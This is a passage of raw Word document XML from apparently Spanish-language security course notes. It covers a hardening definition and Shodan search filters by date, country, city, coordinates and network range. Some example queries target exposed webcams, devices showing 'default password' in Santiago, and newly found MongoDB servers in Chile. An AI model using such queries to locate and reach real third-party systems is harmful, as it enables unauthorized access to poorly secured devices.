    </w:p>
    <w:p w14:paraId="13D2E913" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49998D49" w14:textId="7CF5F3A0" w:rsidR="004559A0" w:rsidRPr="00C24100" w:rsidRDefault="004559A0" w:rsidP="004559A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.</w:t>
      </w:r>
      <w:r w:rsidR="00F93CF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidRPr="004559A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BANNER PERSONALIZADO (Nivel Pro):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3F002" w14:textId="597B427C" w:rsidR="00F93CF1" w:rsidRDefault="00B15101" w:rsidP="00B15101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D0E8E98" wp14:editId="5225E4FC">
            <wp:extent cx="4335780" cy="1271829"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1332699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06" cy="12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319C7E87" wp14:editId="468541C7">
            <wp:extent cx="4290060" cy="2729605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15916627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14" cy="27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12485FE6" wp14:editId="65DED432">
            <wp:extent cx="4396740" cy="2259504"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="3087643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07" cy="22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0D36AE9D" wp14:editId="233C48EC">
            <wp:extent cx="4427220" cy="2280093"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2970690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51" cy="22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A819" w14:textId="4A583950" w:rsidR="00F93CF1" w:rsidRDefault="00F93CF1" w:rsidP="00F93CF1">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93CF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.11 Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29112896" w14:textId="6C859CDB" w:rsidR="00F93CF1" w:rsidRDefault="00F93CF1" w:rsidP="00F93CF1">
      <w:r>
        <w:t xml:space="preserve">Proceso de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">reforzar la seguridad </w:t>
      </w:r>
      <w:r>
        <w:t>de un sistema reduciendo su superficie de ataque.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ejemplo: desactivar servicios innecesarios, actualizar software, usar contraseñas seguras, configurar firewalls, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007EC67E" w14:textId="77777777" w:rsidR="00F93CF1" w:rsidRDefault="00F93CF1" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="5662C0A3" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="7A3603B9" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="13A1790E" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="0757F4F7" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="1C0AF73B" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="0CB79353" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="616C79C7" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="2A0D61DA" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="7EAD795F" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="4E448DD0" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="47985202" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="3E6FFCAA" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="5D74F81C" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="3CC72F52" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="066A0656" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="0861E429" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="3139A0F2" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="5712ADC5" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="7CC74D6B" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="50EAD6BC" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="24064FD3" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="75D73885" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="0BF4CBAF" w14:textId="77777777" w:rsidR="00177074" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="533C4BD5" w14:textId="77777777" w:rsidR="00177074" w:rsidRPr="00F93CF1" w:rsidRDefault="00177074" w:rsidP="00F93CF1"/>
    <w:p w14:paraId="26BC41D1" w14:textId="77777777" w:rsidR="00F93CF1" w:rsidRPr="009A31CF" w:rsidRDefault="00F93CF1" w:rsidP="00B15101">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC36AC3" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="001E2EAD" w:rsidP="000951E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5025CFDF" w14:textId="77777777" w:rsidR="00417BB5" w:rsidRPr="009A31CF" w:rsidRDefault="00417BB5" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1844B5FD" w14:textId="00AC5751" w:rsidR="00417BB5" w:rsidRDefault="00417BB5" w:rsidP="00417BB5">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009E40BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00177074">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="009E40BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Shodan: Comandos principales</w:t>
      </w:r>
      <w:r w:rsidR="009E40BB" w:rsidRPr="009E40BB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> y consultas avanzadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C26BE" w14:textId="5B48744C" w:rsidR="00417BB5" w:rsidRDefault="009E40BB" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E40BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Comandos principales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63155AD4" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="009E40BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FILTROS TEMPORALES</w:t>
      </w:r>
      <w:r w:rsidRPr="0069052B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA91F3" w14:textId="42FF9C20" w:rsidR="009E40BB" w:rsidRDefault="009E40BB" w:rsidP="00875709">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
      </w:pPr>
      <w:r w:rsidRPr="00507F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">after:dd/mm/yyyy </w:t>
      </w:r>
      <w:r w:rsidRPr="009E40BB">
        <w:t>- Resultados después de una fech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69052B" w14:paraId="7DAA13AB" w14:textId="77777777" w:rsidTr="0069052B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F57777" w14:textId="77777777" w:rsidR="0069052B" w:rsidRPr="0069052B" w:rsidRDefault="0069052B" w:rsidP="0069052B">
            <w:r w:rsidRPr="0069052B">
              <w:t>apache after:01/01/2025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C290B79" w14:textId="2BF4F157" w:rsidR="0069052B" w:rsidRPr="0069052B" w:rsidRDefault="0069052B" w:rsidP="0069052B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069052B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="0069052B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Servidores Apache descubiertos después del 1 enero 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15CAD35B" w14:textId="77777777" w:rsidR="0069052B" w:rsidRDefault="0069052B" w:rsidP="0069052B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55839178" w14:textId="400EE097" w:rsidR="0069052B" w:rsidRPr="00507F48" w:rsidRDefault="0069052B" w:rsidP="00875709">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>before:dd/mm/yyyy - Resultados antes de una fecha</w:t>
      </w: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10070"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069052B" w14:paraId="0FFCD568" w14:textId="77777777" w:rsidTr="006B41DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269C38BB" w14:textId="77777777" w:rsidR="0069052B" w:rsidRPr="0069052B" w:rsidRDefault="0069052B" w:rsidP="0069052B">
            <w:r w:rsidRPr="0069052B">
              <w:t>mysql before:31/12/2024</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529096FA" w14:textId="52393526" w:rsidR="0069052B" w:rsidRDefault="0069052B" w:rsidP="0069052B">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069052B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="0069052B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bases de datos MySQL encontradas antes del 31 dic 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A17A421" w14:textId="77777777" w:rsidR="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5915C876" w14:textId="3CBD028D" w:rsidR="006B41DF" w:rsidRPr="00507F48" w:rsidRDefault="006B41DF" w:rsidP="00507F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uso práctico:</w:t>
      </w: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10070"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B41DF" w14:paraId="59552D4F" w14:textId="77777777" w:rsidTr="006B41DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32DEEA08" w14:textId="77777777" w:rsidR="006B41DF" w:rsidRPr="006B41DF" w:rsidRDefault="006B41DF" w:rsidP="006B41DF">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B41DF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"MongoDB Server Information" after:01/10/2025 country:CL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FA2B20" w14:textId="2CC500E3" w:rsidR="006B41DF" w:rsidRDefault="006B41DF" w:rsidP="006B41DF">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B41DF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="006B41DF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> MongoDB en Chile descubiertas recientemente (posibles nuevas vulnerabilidades)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A02173F" w14:textId="77777777" w:rsidR="006B41DF" w:rsidRDefault="006B41DF" w:rsidP="006B41DF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0DA32A" w14:textId="26AB705B" w:rsidR="006B41DF" w:rsidRPr="006B41DF" w:rsidRDefault="006B41DF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FILTROS GEOGRÁFICOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDCC5DF" w14:textId="71C96FE3" w:rsidR="001669BD" w:rsidRPr="001669BD" w:rsidRDefault="001669BD" w:rsidP="00270E8B">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001669BD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>country:</w:t>
      </w:r>
      <w:r w:rsidRPr="001669BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Código de país (2 letra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1669BD" w14:paraId="4E47114E" w14:textId="77777777" w:rsidTr="001669BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B2E01D" w14:textId="77777777" w:rsidR="001669BD" w:rsidRPr="001669BD" w:rsidRDefault="001669BD" w:rsidP="001669BD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001669BD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>apache country:US</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="344CA09D" w14:textId="77777777" w:rsidR="001669BD" w:rsidRPr="001669BD" w:rsidRDefault="001669BD" w:rsidP="001669BD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001669BD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>apache country:CL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C47EC74" w14:textId="7ABA65F9" w:rsidR="001669BD" w:rsidRDefault="001669BD" w:rsidP="001669BD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001669BD">
              <w:t>apache country:AR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B863064" w14:textId="77777777" w:rsidR="001669BD" w:rsidRDefault="001669BD" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF60277" w14:textId="77777777" w:rsidR="001669BD" w:rsidRPr="001669BD" w:rsidRDefault="001669BD" w:rsidP="00270E8B">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001669BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>city:</w:t>
      </w:r>
      <w:r w:rsidRPr="001669BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ciudad especí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7F48" w:rsidRPr="00B941CC" w14:paraId="1E6C0A73" w14:textId="77777777" w:rsidTr="00507F48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20A8DDB7" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00507F48">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"default password" city:Santiago</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D93E95B" w14:textId="094E7805" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00507F48">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>webcam city:"New York"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="530D794F" w14:textId="77777777" w:rsidR="001669BD" w:rsidRDefault="001669BD" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA96C75" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="000951E1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>geo: - Coordenadas GP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7F48" w:rsidRPr="00507F48" w14:paraId="40A2BF3B" w14:textId="77777777" w:rsidTr="00507F48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37E923C7" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:r w:rsidRPr="00507F48">
              <w:t># 2 parámetros: latitud, longitud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060E5174" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:r w:rsidRPr="00507F48">
              <w:t>geo:42.9693,-72.4824</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E577F8B" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48"/>
          <w:p w14:paraId="2DC4DE60" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:r w:rsidRPr="00507F48">
              <w:t># 3 parámetros: lat, lon, rango en km</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7493CB7C" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:r w:rsidRPr="00507F48">
              <w:t>geo:42.9693,-72.4824,10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F2403E" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48"/>
          <w:p w14:paraId="3C976F74" w14:textId="77777777" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:r w:rsidRPr="00507F48">
              <w:t># 4 parámetros: área rectangular</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1409377F" w14:textId="189B8252" w:rsidR="00507F48" w:rsidRPr="00507F48" w:rsidRDefault="00507F48" w:rsidP="00507F48">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00507F48">
              <w:t>geo:33.5,-111.9,33.4,-111.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B1744F6" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F500FA9" w14:textId="77777777" w:rsidR="000951E1" w:rsidRDefault="000951E1" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD15D31" w14:textId="77777777" w:rsidR="000951E1" w:rsidRDefault="000951E1" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F3F2E9" w14:textId="77777777" w:rsidR="000951E1" w:rsidRDefault="000951E1" w:rsidP="006B41DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C19FE2D" w14:textId="0CD54CCC" w:rsidR="00A47D8E" w:rsidRDefault="00A47D8E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47D8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FILTROS DE RED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027F001" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRPr="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="000951E1">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47D8E">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>net:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Rango de red CID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7D8E" w14:paraId="5509885F" w14:textId="77777777" w:rsidTr="00A47D8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6597C3C5" w14:textId="77777777" w:rsidR="00A47D8E" w:rsidRPr="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="00A47D8E">
            <w:r w:rsidRPr="00A47D8E">
              <w:t>net:200.1.1.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0131229D" w14:textId="0A3E5115" w:rsidR="00A47D8E" w:rsidRDefault="00A47D8E" w:rsidP="00A47D8E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
